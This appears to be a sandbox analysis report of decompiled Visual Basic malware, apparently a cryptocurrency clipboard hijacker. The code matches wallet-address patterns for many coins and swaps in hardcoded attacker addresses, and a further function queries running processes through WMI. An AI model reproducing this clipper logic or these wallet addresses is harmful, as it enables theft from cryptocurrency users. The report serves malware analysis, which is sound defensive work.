              																			_v76 = L"GDQHVF35R5DW5TH5QRF5XA754UABPCEVKKHPTPE3HXIMU5XOE5G5ZLDG";
              																			goto L121;
              																		}
              																	} else {
              																		if(_v48 == 0) {
              																			_push( &_v48);
              																			_push(0x412750);
              																			L0040131C();
              																		}
              																		_t619 = _v48;
              																		_t480 =  *((intOrPtr*)( *_t619 + 0x20))(_t619, L"\\b1[0-9a-zA-Z]{46,47}\\b");
              																		asm("fclex");
              																		if(_t480 < 0) {
              																			_push(0x20);
              																			_push(0x412740);
              																			_push(_t619);
              																			_push(_t480);
              																			L00401322();
              																		}
              																		_t460 = _v48;
              																		if(_t460 == 0) {
              																			_push( &_v48);
              																			_push(0x412750);
              																			L0040131C();
              																			_t460 = _v48;
              																		}
              																		_v104 = _t460;
              																		_v76 = L"15hXAH4wYrCKz3R2MVRTaY3y8yqMePHova2KCwvQGd2shLDz";
              																		goto L121;
              																	}
              																} else {
              																	if(_v48 == 0) {
              																		_push( &_v48);
              																		_push(0x412750);
              																		L0040131C();
              																	}
              																	_t620 = _v48;
              																	_t484 =  *((intOrPtr*)( *_t620 + 0x20))(_t620, L"\\br[0-9a-zA-Z]{33}\\b");
              																	asm("fclex");
              																	if(_t484 < 0) {
              																		_push(0x20);
              																		_push(0x412740);
              																		_push(_t620);
              																		_push(_t484);
              																		L00401322();
              																	}
              																	_t460 = _v48;
              																	if(_t460 == 0) {
              																		_push( &_v48);
              																		_push(0x412750);
              																		L0040131C();
              																		_t460 = _v48;
              																	}
              																	_v104 = _t460;
              																	_v76 = L"rpQEW6WqhvuqqxfqPUhwA5s8zPENVddUBi";
              																	goto L121;
              																}
              															} else {
              																if(_v48 == 0) {
              																	_push( &_v48);
              																	_push(0x412750);
              																	L0040131C();
              																}
              																_t621 = _v48;
              																_t488 =  *((intOrPtr*)( *_t621 + 0x20))(_t621, L"\\bbnb[0-9a-zA-Z]{39}\\b");
              																asm("fclex");
              																if(_t488 < 0) {
              																	_push(0x20);
              																	_push(0x412740);
              																	_push(_t621);
              																	_push(_t488);
              																	L00401322();
              																}
              																_t460 = _v48;
              																if(_t460 == 0) {
              																	_push( &_v48);
              																	_push(0x412750);
              																	L0040131C();
              																	_t460 = _v48;
              																}
              																_v104 = _t460;
              																_v76 = L"bnb1sy8wkqcayfpax9tn3wj8rmtd9pdw2asq0dd0xd";
              																goto L121;
              															}
              														} else {
              															if(_v48 == 0) {
              																_push( &_v48);
              																_push(0x412750);
              																L0040131C();
              															}
              															_t622 = _v48;
              															_t492 =  *((intOrPtr*)( *_t622 + 0x20))(_t622, L"\\bT[0-9a-zA-Z]{33}\\b");
              															asm("fclex");
              															if(_t492 < 0) {
              																_push(0x20);
              																_push(0x412740);
              																_push(_t622);
              																_push(_t492);
              																L00401322();
              															}
              															_t460 = _v48;
              															if(_t460 == 0) {
              																_push( &_v48);
              																_push(0x412750);
              																L0040131C();
              																_t460 = _v48;
              															}
              															_v104 = _t460;
              															_v76 = L"THYmz75uHVVbuJGGy2dv6BVy1W2iA8rqfm";
              															goto L121;
              														}
              													} else {
              														if(_v48 == 0) {
              															_push( &_v48);
              															_push(0x412750);
              															L0040131C();
              														}
              														_t623 = _v48;
              														_t496 =  *((intOrPtr*)( *_t623 + 0x20))(_t623, L"\\b(4|8)?[0-9A-Z]{1}[0-9a-zA-Z]{93}([0-9a-zA-Z]{11})?\\b");
              														asm("fclex");
              														if(_t496 < 0) {
              															_push(0x20);
              															_push(0x412740);
              															_push(_t623);
              															_push(_t496);
              															L00401322();
              														}
              														_t460 = _v48;
              														if(_t460 == 0) {
              															_push( &_v48);
              															_push(0x412750);
              															L0040131C();
              															_t460 = _v48;
              														}
              														_v104 = _t460;
              														_v76 = L"8BQAzQwVETtFWGmAFZjAwNSYA7M4EczfocpPa2kZ6AiC1tVQuAhJTRjLG5Nkk4QqFWHxiKBdi6RuUFjC5zMhvhUyK7tatMA";
              														goto L121;
              													}
              												} else {
              													_v76 = L"\\b(DdzFF.*)|(addr1.*)|(Ae2.*)\\b";
              													_v84 = _t629;
              													L00401376();
              													_t457 = E00416178(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100);
              													goto L6;
              												}
              											} else {
              												if(_v48 == 0) {
              													_push( &_v48);
              													_push(0x412750);
              													L0040131C();
              												}
              												_t624 = _v48;
              												_t502 =  *((intOrPtr*)( *_t624 + 0x20))(_t624, L"\\bA[0-9a-zA-Z]{33}\\b");
              												asm("fclex");
              												if(_t502 < 0) {
              													_push(0x20);
              													_push(0x412740);
              													_push(_t624);
              													_push(_t502);
              													L00401322();
              												}
              												_t460 = _v48;
              												if(_t460 == 0) {
              													_push( &_v48);
              													_push(0x412750);
              													L0040131C();
              													_t460 = _v48;
              												}
              												_v104 = _t460;
              												_v76 = L"AYVbHuVPWRd5KbDmwXhNXJ3oVZCgrUFbEn";
              												goto L121;
              											}
              										} else {
              											if(_v48 == 0) {
              												_push( &_v48);
              												_push(0x412750);
              												L0040131C();
              											}
              											_t625 = _v48;
              											_t506 =  *((intOrPtr*)( *_t625 + 0x20))(_t625, L"\\bX[1-9A-HJ-NP-Za-km-z]{33}\\b");
              											asm("fclex");
              											if(_t506 < 0) {
              												_push(0x20);
              												_push(0x412740);
              												_push(_t625);
              												_push(_t506);
              												L00401322();
              											}
              											_t460 = _v48;
              											if(_t460 == 0) {
              												_push( &_v48);
              												_push(0x412750);
              												L0040131C();
              												_t460 = _v48;
              											}
              											_v104 = _t460;
              											_v76 = L"XnLLQs7esH6XMFREhuFfirgDBwm8QuRoGH";
              											goto L121;
              										}
              									} else {
              										_v76 = L"\\bD{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}\\b";
              										_v84 = _t629;
              										L00401376();
              										_t457 = E00416A06(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100);
              										goto L6;
              									}
              								} else {
              									_v76 = L"\\b(ltc1|[LM])[a-zA-HJ-NP-Z0-9]{26,40}\\b";
              									_v84 = _t629;
              									L00401376();
              									_t457 = E00414CC1(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100);
              									goto L6;
              								}
              							} else {
              								_v76 = L"\\b((bitcoincash|bchreg|bchtest):)?(q|p)[a-z0-9]{41}\\b";
              								_v84 = _t629;
              								L00401376();
              								_t457 = E004166F9(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100);
              								goto L6;
              							}
              						} else {
              							if(_v48 == 0) {
              								_push( &_v48);
              								_push(0x412750);
              								L0040131C();
              							}
              							_t626 = _v48;
              							_t516 =  *((intOrPtr*)( *_t626 + 0x20))(_t626, L"\\b4([0-9]|[A-J])(.){93,106}\\b");
              							asm("fclex");
              							if(_t516 < 0) {
              								_push(0x20);
              								_push(0x412740);
              								_push(_t626);
              								_push(_t516);
              								L00401322();
              							}
              							_t460 = _v48;
              							if(_t460 == 0) {
              								_push( &_v48);
              								_push(0x412750);
              								L0040131C();
              								_t460 = _v48;
              							}
              							_v104 = _t460;
              							_v76 = L"4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV";
              							L121:
              							_v84 = _t629;
              							asm("movsd");
              							asm("movsd");
              							asm("movsd");
              							asm("movsd");
              							_t457 =  *((intOrPtr*)( *_t460 + 0x44))(_t460,  *0x419028,  &_v52);
              							asm("fclex");
              							if(_t457 < 0) {
              								_push(0x44);
              								_push(0x412740);
              								_push(_v104);
              								_push(_t457);
              								L00401322();
              							}
              							_v52 = _v52 & 0x00000000;
              							L0040136A();
              						}
              					} else {
              						_v76 = L"\\b0x[a-fA-F0-9]{40}\\b";
              						_v84 = _t629;
              						L00401376();
              						_t457 = E00416446(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100);
              						goto L6;
              					}
              				} else {
              					_v76 = L"\\b([13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[ac-hj-np-zAC-HJ-NP-Z02-9]{11,71})\\b";
              					_v84 = _t629;
              					L00401376();
              					_t457 = E0041372E(0x419028,  &_v68, 0x4008, _t629,  &_v68,  &_v100);
              					L6:
              					L00401352();
              				}
              				_push( *0x419028);
              				_push(_v172);
              				L00401316();
              				if(_t457 == 0) {
              				}
              				L00401328();
              				_push(0x417aee);
              				L00401352();
              				L0040132E();
              				return _t457;
              			}

              APIs
              • __vbaStrCopy.MSVBVM60(00000000,0000000A,00411CA4), ref: 00416FED
              • __vbaNew2.MSVBVM60(00412750,?,00000000,0000000A,00411CA4), ref: 00417000
              • __vbaHresultCheckObj.MSVBVM60(00000000,?,00412740,00000030), ref: 0041701F
              • __vbaVarCopy.MSVBVM60(00000000,?,00412740,00000030), ref: 00417037
              • __vbaVarDup.MSVBVM60(00000000,?,00412740,00000030), ref: 00417057
              • __vbaFreeVar.MSVBVM60(?,?), ref: 00417070
              • __vbaVarDup.MSVBVM60(?,?), ref: 00417092
              • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?), ref: 004170A7
              • __vbaVarDup.MSVBVM60(?,?), ref: 004170C1
                • Part of subcall function 004134FB: #716.MSVBVM60(?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 00413562
                • Part of subcall function 004134FB: __vbaVarSetVar.MSVBVM60(?,?,?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 0041356F
                • Part of subcall function 004134FB: __vbaVarVargNofree.MSVBVM60(?,?,?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 0041357D
                • Part of subcall function 004134FB: __vbaVarLateMemSt.MSVBVM60(?,Pattern,00000000,00004008,00000008,00419028), ref: 00413596
                • Part of subcall function 004134FB: __vbaVarLateMemSt.MSVBVM60(?,IgnoreCase,?,?,?,?,?,?,00000008,00419028), ref: 004135BB
                • Part of subcall function 004134FB: __vbaVarLateMemSt.MSVBVM60(?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 004135E0
                • Part of subcall function 004134FB: __vbaVarMove.MSVBVM60(?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 004135F5
                • Part of subcall function 004134FB: __vbaVargVar.MSVBVM60(?,?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 00413604
              • __vbaFreeVar.MSVBVM60(?,?,?,?), ref: 004170DA
              • __vbaVarDup.MSVBVM60(?,?,?,?), ref: 004170FC
                • Part of subcall function 00416446: #716.MSVBVM60(?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 004164B6
                • Part of subcall function 00416446: __vbaVarSetVar.MSVBVM60(?,?,?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 004164C3
                • Part of subcall function 00416446: __vbaVarVargNofree.MSVBVM60(?,?,?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 004164D1
                • Part of subcall function 00416446: __vbaVarLateMemSt.MSVBVM60(?,Pattern,00000000,00004008,00000008,00419028), ref: 004164EA
                • Part of subcall function 00416446: __vbaVarLateMemSt.MSVBVM60(?,IgnoreCase,?,?,?,?,?,?,00000008,00419028), ref: 0041650F
                • Part of subcall function 00416446: __vbaVarLateMemSt.MSVBVM60(?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 00416534
                • Part of subcall function 00416446: __vbaVarMove.MSVBVM60(?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 00416549
                • Part of subcall function 00416446: __vbaVargVar.MSVBVM60(?,?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 00416558
              • __vbaVarDup.MSVBVM60(?,?,?,?), ref: 00417120
              • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?), ref: 00417139
              • __vbaNew2.MSVBVM60(00412750,00000000,?,?,?,?,?,?), ref: 00417154
              • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00412740,00000020), ref: 00417176
              • __vbaNew2.MSVBVM60(00412750,00000000), ref: 0041718B
              • __vbaVarDup.MSVBVM60(?,?,?,?,?,?), ref: 004171B8
                • Part of subcall function 004134FB: __vbaVarLateMemCallLd.MSVBVM60(?,?,Execute,00000001), ref: 00413625
                • Part of subcall function 004134FB: __vbaVarSetVar.MSVBVM60(?,00000000), ref: 00413632
                • Part of subcall function 004134FB: __vbaForEachVar.MSVBVM60(?,?,?,?,?,?,?,00000000), ref: 0041365B
                • Part of subcall function 004134FB: __vbaVarAdd.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,00000000), ref: 0041367A
                • Part of subcall function 004134FB: __vbaVarMove.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,00000000), ref: 00413684
                • Part of subcall function 004134FB: __vbaNextEachVar.MSVBVM60(?,?,?,?,?,?,00000002,?,?,?,?,?,?,?,?,00000000), ref: 004136A9
                • Part of subcall function 004134FB: __vbaVarCmpGe.MSVBVM60(?,00008002,?,?,?,?,?,?,?,?,00000000), ref: 004136C3
                • Part of subcall function 004134FB: __vbaBoolVar.MSVBVM60(00000000,?,00008002,?,?,?,?,?,?,?,?,00000000), ref: 004136C9
                • Part of subcall function 004134FB: __vbaAryUnlock.MSVBVM60(?,00413719,00000000,?,00008002,?,?,?,?,?,?,?,?,00000000), ref: 004136E8
                • Part of subcall function 004134FB: __vbaFreeObj.MSVBVM60(?,00413719,00000000,?,00008002,?,?,?,?,?,?,?,?,00000000), ref: 004136F3
                • Part of subcall function 004134FB: __vbaFreeVar.MSVBVM60(?,00413719,00000000,?,00008002,?,?,?,?,?,?,?,?,00000000), ref: 004136FB
                • Part of subcall function 004134FB: __vbaFreeVar.MSVBVM60(?,00413719,00000000,?,00008002,?,?,?,?,?,?,?,?,00000000), ref: 00413703
                • Part of subcall function 004134FB: __vbaFreeVar.MSVBVM60(?,00413719,00000000,?,00008002,?,?,?,?,?,?,?,?,00000000), ref: 0041370B
                • Part of subcall function 004134FB: __vbaFreeVar.MSVBVM60(?,00413719,00000000,?,00008002,?,?,?,?,?,?,?,?,00000000), ref: 00413713
              • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?), ref: 004171D1
              • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?), ref: 004171F3
                • Part of subcall function 004166F9: #716.MSVBVM60(?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 00416769
                • Part of subcall function 004166F9: __vbaVarSetVar.MSVBVM60(?,?,?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 00416776
                • Part of subcall function 004166F9: __vbaVarVargNofree.MSVBVM60(?,?,?,VBScript.RegExp,00000000,00004008,00000008,00419028), ref: 00416784
                • Part of subcall function 004166F9: __vbaVarLateMemSt.MSVBVM60(?,Pattern,00000000,00004008,00000008,00419028), ref: 0041679D
                • Part of subcall function 004166F9: __vbaVarLateMemSt.MSVBVM60(?,IgnoreCase,?,?,?,?,?,?,00000008,00419028), ref: 004167C2
                • Part of subcall function 004166F9: __vbaVarLateMemSt.MSVBVM60(?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 004167E7
                • Part of subcall function 004166F9: __vbaVarMove.MSVBVM60(?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 004167FC
                • Part of subcall function 004166F9: __vbaVargVar.MSVBVM60(?,?,Global,?,?,?,?,?,?,?,?,?,?,00000008,00419028), ref: 0041680B
              • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?), ref: 0041721A
              • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?), ref: 00417233
              • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?), ref: 00417255
              • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00412740,00000044,?,?,?,?), ref: 00417A7C
              • __vbaStrMove.MSVBVM60(?,?,?,?), ref: 00417A8A
              • __vbaStrCmp.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00417A9B
              • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00417AB2
              • __vbaFreeVar.MSVBVM60(00417AEE,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00417AE0
              • __vbaFreeObj.MSVBVM60(00417AEE,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00417AE8
              Memory Dump Source
              • Source File: 00000000.00000002.699080451.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.699077488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.699098890.0000000000419000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.699104365.000000000041A000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Runtime Explorer.jbxd
              Similarity
              • API ID: __vba$Free$Late$Varg$Move$#716CheckCopyHresultNew2Nofree$Each$BoolCallNextUnlock
              • String ID: 15hXAH4wYrCKz3R2MVRTaY3y8yqMePHova2KCwvQGd2shLDz$4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV$8BQAzQwVETtFWGmAFZjAwNSYA7M4EczfocpPa2kZ6AiC1tVQuAhJTRjLG5Nkk4QqFWHxiKBdi6RuUFjC5zMhvhUyK7tatMA$AYVbHuVPWRd5KbDmwXhNXJ3oVZCgrUFbEn$AcLSFNivGXo5DnoPqAdVxHB7qQrUvxjgXxmrGhEFH6v4$GDQHVF35R5DW5TH5QRF5XA754UABPCEVKKHPTPE3HXIMU5XOE5G5ZLDG$THYmz75uHVVbuJGGy2dv6BVy1W2iA8rqfm$VaxnygQcu3SgKp7hEZ79mF5wDGm22yp2zo$XIXWLMD7DIAHQQ6TQOFMVS5JTBS6IXVFY4KHENNWQUWM7TL7GE27IW67JM$XnLLQs7esH6XMFREhuFfirgDBwm8QuRoGH$\b((bitcoincash|bchreg|bchtest):)?(q|p)[a-z0-9]{41}\b$\b(4|8)?[0-9A-Z]{1}[0-9a-zA-Z]{93}([0-9a-zA-Z]{11})?\b$\b(DdzFF.*)|(addr1.*)|(Ae2.*)\b$\b([13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[ac-hj-np-zAC-HJ-NP-Z02-9]{11,71})\b$\b(ltc1|[LM])[a-zA-HJ-NP-Z0-9]{26,40}\b$\b0x[a-fA-F0-9]{40}\b$\b1[0-9a-zA-Z]{46,47}\b$\b4([0-9]|[A-J])(.){93,106}\b$\bA[0-9a-zA-Z]{33}\b$\bD{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}\b$\bG[0-9a-zA-Z]{55}\b$\bT[0-9a-zA-Z]{33}\b$\bV[0-9a-zA-Z]{33,42}\b$\bX[1-9A-HJ-NP-Za-km-z]{33}\b$\b[0-9a-zA-Z]{44}\b$\bbnb[0-9a-zA-Z]{39}\b$\bdgb[0-9a-zA-Z]{40}\b$\br[0-9a-zA-Z]{33}\b$^(?!addr.*).{58}$$bnb1sy8wkqcayfpax9tn3wj8rmtd9pdw2asq0dd0xd$dgb1qq4mmfkgjxkg40y9p568nm396syq5x7cxpljjs7$rpQEW6WqhvuqqxfqPUhwA5s8zPENVddUBi
              • API String ID: 1992489938-1790931049
              • Opcode ID: 5032471cdf8095c1a91be09b11e60d869e6a3e1edb4ef14c7e688c2622343172
              • Instruction ID: 52c8c87c32352a58dc4c703ac3da98801b7842c6852d236e7058b05d260bda32
              • Opcode Fuzzy Hash: 5032471cdf8095c1a91be09b11e60d869e6a3e1edb4ef14c7e688c2622343172
              • Instruction Fuzzy Hash: 3D72D770D00358DADF10EFE5C985ADEB7B8BF08704F54812BE405BB291D7B89989CB59
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 56%
              			E00412C74(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr* _a8) {
              				signed int _v12;
              				signed int _v16;
              				intOrPtr _v20;
              				intOrPtr _v24;
              				char _v40;
              				char _v44;
              				char _v48;
              				char _v52;
              				signed int _v56;
              				signed int _v60;
              				char _v76;
              				intOrPtr _v84;
              				char _v92;
              				char _v108;
              				char* _v116;
              				char _v124;
              				char _v148;
              				char* _v172;
              				intOrPtr* _t65;
              				char* _t70;
              				char* _t76;
              				char* _t78;
              				char* _t81;
              				char* _t83;
              				char* _t84;
              				signed int _t87;
              				void* _t108;
              				void* _t110;
              				intOrPtr _t111;
              				intOrPtr _t112;
              				void* _t115;
              
              				_t111 = _t110 - 0x14;
              				 *[fs:0x0] = _t111;
              				_t112 = _t111 - 0x8c;
              				_v24 = _t112;
              				_v20 = E00401150;
              				_t87 = 0;
              				_v16 = 0;
              				_v12 = 0;
              				_t65 = _a4;
              				 *((intOrPtr*)( *_t65 + 4))(_t65, __edi, __esi, __ebx,  *[fs:0x0], 0x401256, _t108);
              				_v40 = 0;
              				_v44 = 0;
              				_v48 = 0;
              				_v52 = 0;
              				_v56 = 0;
              				_v60 = 0;
              				_v76 = 0;
              				_v92 = 0;
              				_v108 = 0;
              				_v124 = 0;
              				_v148 = 0;
              				_push(1);
              				L0040138E();
              				_v84 = 0x80020004;
              				_v92 = 0xa;
              				_v116 = L"winmgmts:";
              				_v124 = 8;
              				L00401376();
              				_push( &_v92);
              				_push( &_v76);
              				_push( &_v108); // executed
              				L0040137C(); // executed
              				_t70 =  &_v108;
              				_push(_t70);
              				L00401382();
              				_push(_t70);
              				_push( &_v52);
              				L00401388();
              				_push( &_v108);
              				_push( &_v92);
              				_push( &_v76);
              				_push(3);
              				L00401370();
              				_t76 =  *_a8;
              				_v172 = _t76;
              				_push(L"SELECT * FROM win32_process WHERE Name = \'");
              				_push(_t76);
              				L00401364();
              				L0040136A();
              				_push(_t76);
              				_push(0x411c60);
              				L00401364();
              				L0040136A();
              				L0040135E();
              				_v116 =  &_v44;
              				_v124 = 0x4008;
              				asm("movsd");
              				asm("movsd");
              				asm("movsd");
              				asm("movsd");
              				_push(1);
              				_push(L"execquery");
              				_push(_v52);
              				_t78 =  &_v76;
              				_push(_t78); // executed
              				L00401358(); // executed
              				_t115 = _t112 + 0x10 - 0x10 + 0x20;
              				_push(_t78);
              				L00401382();
              				_push(_t78);
              				_push( &_v40);
              				L00401388();
              				L00401352();
              				_push(_v40);
              				_push( &_v48);
              				_t81 =  &_v148;
              				_push(_t81); // executed
              				L0040134C(); // executed
              				while(_t81 != _t87) {
              					_v116 = _v172;
              					_v124 = 0x8008;
              					_push(_t87);
              					_push(L"Name");
              					_push(_v48);
              					_t83 =  &_v76;
              					_push(_t83);
              					L00401358();
              					_t115 = _t115 + 0x10;
              					_push(_t83);
              					_t84 =  &_v124;
              					_push(_t84);
              					L00401346();
              					L00401352();
              					if(_t84 != _t87) {
              						_t87 = _t87 | 0xffffffff;
              						_t81 =  &_v148;
              						_push(_t81);
              						L00401340();
              					} else {
              						_push( &_v48);
              						_t81 =  &_v148;
              						_push(_t81);
              						L0040133A();
              						continue;
              					}
              					break;
              				}
              				_v56 = _t87;
              				L00401334();
              				_push(0x412e91);
              				L0040132E();
              				L0040132E();
              				L0040135E();
              				L0040132E();
              				L0040132E();
              				return _t81;
              			}

              APIs
              • __vbaOnError.MSVBVM60(00000001), ref: 00412CD7
              • __vbaVarDup.MSVBVM60(00000001), ref: 00412CFE
              • #626.MSVBVM60(?,?,0000000A,00000001), ref: 00412D0F
              • __vbaObjVar.MSVBVM60(?,?,?,0000000A,00000001), ref: 00412D18
              • __vbaObjSetAddref.MSVBVM60(?,00000000,?,?,?,0000000A,00000001), ref: 00412D22
              • __vbaFreeVarList.MSVBVM60(00000003,?,0000000A,?,?,00000000,?,?,?,0000000A,00000001), ref: 00412D35
              • __vbaStrCat.MSVBVM60(?,SELECT * FROM win32_process WHERE Name = ',00000001), ref: 00412D4E
              • __vbaStrMove.MSVBVM60(?,SELECT * FROM win32_process WHERE Name = ',00000001), ref: 00412D58
              • __vbaStrCat.MSVBVM60(00411C60,00000000,?,SELECT * FROM win32_process WHERE Name = ',00000001), ref: 00412D63
              • __vbaStrMove.MSVBVM60(00411C60,00000000,?,SELECT * FROM win32_process WHERE Name = ',00000001), ref: 00412D6D
              • __vbaFreeStr.MSVBVM60(00411C60,00000000,?,SELECT * FROM win32_process WHERE Name = ',00000001), ref: 00412D75
              • __vbaLateMemCallLd.MSVBVM60(?,?,execquery,00000001,?,?,?,?,00000001), ref: 00412DA1
              • __vbaObjVar.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00412DAA
              • __vbaObjSetAddref.MSVBVM60(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00412DB4
              • __vbaFreeVar.MSVBVM60(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00412DBC
              • __vbaForEachCollAd.MSVBVM60(?,?,?,?,00000000,00000000), ref: 00412DCF
              • __vbaLateMemCallLd.MSVBVM60(?,?,Name,00000000,?,?,?,?,00000000,00000000), ref: 00412DF5
              • __vbaVarTstEq.MSVBVM60(00008008,00000000,?,?,00000000,00000000), ref: 00412E02
              • __vbaFreeVar.MSVBVM60(00008008,00000000,?,?,00000000,00000000), ref: 00412E0C
              • __vbaNextEachCollAd.MSVBVM60(?,?,00008008,00000000,?,?,00000000,00000000), ref: 00412E21
              • __vbaExitEachColl.MSVBVM60(?,00008008,00000000,?,?,00000000,00000000), ref: 00412E32
              • __vbaExitProc.MSVBVM60(?,?,?,?,00000000,00000000), ref: 00412E3A
              • __vbaFreeObj.MSVBVM60(00412E91,?,?,?,?,00000000,00000000), ref: 00412E6B
              • __vbaFreeObj.MSVBVM60(00412E91,?,?,?,?,00000000,00000000), ref: 00412E73
              • __vbaFreeStr.MSVBVM60(00412E91,?,?,?,?,00000000,00000000), ref: 00412E7B
              • __vbaFreeObj.MSVBVM60(00412E91,?,?,?,?,00000000,00000000), ref: 00412E83
              • __vbaFreeObj.MSVBVM60(00412E91,?,?,?,?,00000000,00000000), ref: 00412E8B
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.699080451.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.699077488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.699098890.0000000000419000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.699104365.000000000041A000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_Runtime Explorer.jbxd
              Yara matches
              Similarity
              • API ID: __vba$Free$CollEach$AddrefCallExitLateMove$#626ErrorListNextProc
              • String ID: Name$SELECT * FROM win32_process WHERE Name = '$execquery$winmgmts:
              • API String ID: 2793822420-922686115
              • Opcode ID: 66c29f3985536815d83f7a0eaeea3a33d7769f7eecb11a1713b8ea18cbc03d02
              • Instruction ID: 84cc85d5418cbcc717c3b9c06db5eab627a5667a44a4110c614c832a1513f734
              • Opcode Fuzzy Hash: 66c29f3985536815d83f7a0eaeea3a33d7769f7eecb11a1713b8ea18cbc03d02
              • Instruction Fuzzy Hash: 8251B9B1D00208AAEF10EFE5C885ADEBBB8BF08304F54457EF905B7591DB785A85CB54
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              C-Code - Quality: 37%
              			E004134FB(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a4, void* _a8) {
              				intOrPtr _v8;
              				intOrPtr _v12;
              				char _v36;
              				char _v52;
              				char _v68;
              				char _v84;
              				intOrPtr _v88;
              				char _v104;
              				signed int _v112;
              				char _v120;
              				signed int _v136;
              				char _v156;
              				char _v160;
              				char _v164;
              				char _v168;
              				char _v192;
              				char* _t76;
              				char* _t83;
              				char* _t86;
              				char* _t87;
              				signed int _t120;
              				intOrPtr _t123;
              
              				_push(0x401256);
              				_push( *[fs:0x0]);
              				 *[fs:0x0] = _t123;
              				_v12 = _t123 - 0xac;
              				_v8 = 0x4011c8;
              				_push(0);
              				_push(L"VBScript.RegExp");
              				_push( &_v104);
              				_v36 = 0;
              				_v52 = 0;
              				_v68 = 0;
              				_v84 = 0;
              				_v104 = 0;
              				_v120 = 0;
              				_v136 = 0;
              				_v156 = 0;
              				_v160 = 0;
              				_v164 = 0;
              				_v168 = 0;
              				L004012F2(); // executed
              				_push( &_v104);
              				_push( &_v52);
              				L004013EE();
              				L004013E2();
              				asm("movsd");
              				asm("movsd");
              				asm("movsd");
              				_push(L"Pattern");
              				_push( &_v52);
              				asm("movsd");
              				L004013E8();
              				_v112 = _v112 | 0xffffffff;
              				_v120 = 0xb;
              				asm("movsd");
              				asm("movsd");
              				asm("movsd");
              				_push(L"IgnoreCase");
              				_push( &_v52);
              				asm("movsd");
              				L004013E8();
              				_v112 = _v112 | 0xffffffff;
              				_v120 = 0xb;
              				asm("movsd");
              				asm("movsd");
              				asm("movsd");
              				_push(L"Global");
              				_push( &_v52);
              				asm("movsd");
              				L004013E8();
              				_v112 = 0;
              				_v120 = 2;
              				L004013DC();
              				_push( &_v192);
              				L004013D0();
              				asm("movsd");
              				asm("movsd");
              				asm("movsd");
              				asm("movsd");
              				_t120 = 1;
              				_push(_t120);
              				_push(L"Execute");
              				_push( &_v52);
              				_t76 =  &_v104;
              				_push(_t76); // executed
              				L004013D6(); // executed
              				_push(_t76);
              				_push( &_v84);
              				L004013EE();
              				_push( &_v84);
              				_push( &_v68);
              				_push( &_v156);
              				_push( &_v164);
              				_push( &_v168);
              				_t83 =  &_v160;
              				_push(_t83); // executed
              				L004013CA(); // executed
